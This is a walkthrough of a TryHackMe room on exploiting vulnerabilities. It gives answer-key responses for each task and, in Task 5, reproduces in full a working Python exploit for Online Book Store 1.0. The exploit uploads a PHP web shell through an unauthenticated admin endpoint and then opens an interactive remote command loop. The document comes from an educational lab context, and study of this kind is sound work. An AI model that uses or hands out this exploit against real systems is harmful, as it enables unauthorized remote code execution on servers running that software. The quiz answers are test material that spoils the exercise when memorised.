Exploit Vulnerabilities

THM Room https://tryhackme.com/room/exploitingavulnerabilityv2

TASK 1 : Introduction

Let’s proceed.

No Answer

TASK 2 : Automated Vs. Manual Vulnerability Research

ou are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner ? (Yay/Nay)

Answer : YAY

You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this ?

Answer : Injection

You manage to impersonate another user. What vulnerability is this ?

Answer : Broken Access Control

TASK 3 : Finding Manual Exploits

hat website would you use as a security researcher if you wanted to upload a Proof of Concept ?

Anwser : GitHub

You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use ?

Anwser : Searchsploit

TASK 4 : Example of Manual Exploitation

What type of vulnerability was used in this attack ?

Answer : Remote Code Execution

TASK 5 : Practical: Manual Exploitation

Find out the version of the application that is running. What are the name and version number of the application ?

Open the website and take a look down the page :

Bookshop

Answer : Online Book Store V1.0

Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine.

Let’s research this on google :

BookStore Vulnerabilities

It’s seem good, let’s go ahead and download the exploit :

BookStore RCE

What does the exploit looks like ?

  
# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-01-07
# Exploit Author: Tib3rius
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A

import argparse
import random
import requests
import string
import sys

parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()

url = args.url.rstrip('/')
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'

file = {'image': (random_file + '.php', payload, 'text/php')}
print('> Attempting to upload PHP web shell...')
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
print('> Verifying shell upload...')
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:
    print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
    print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
    if launch_shell.lower() == 'y':
        while True:
            cmd = str(input('RCE $ '))
            if cmd == 'exit':
                sys.exit(0)
            r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
            print(r.text)
else:
    if r.status_code == 200:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
    else:
        print('> Web shell failed to upload! The web server may not have write permissions.')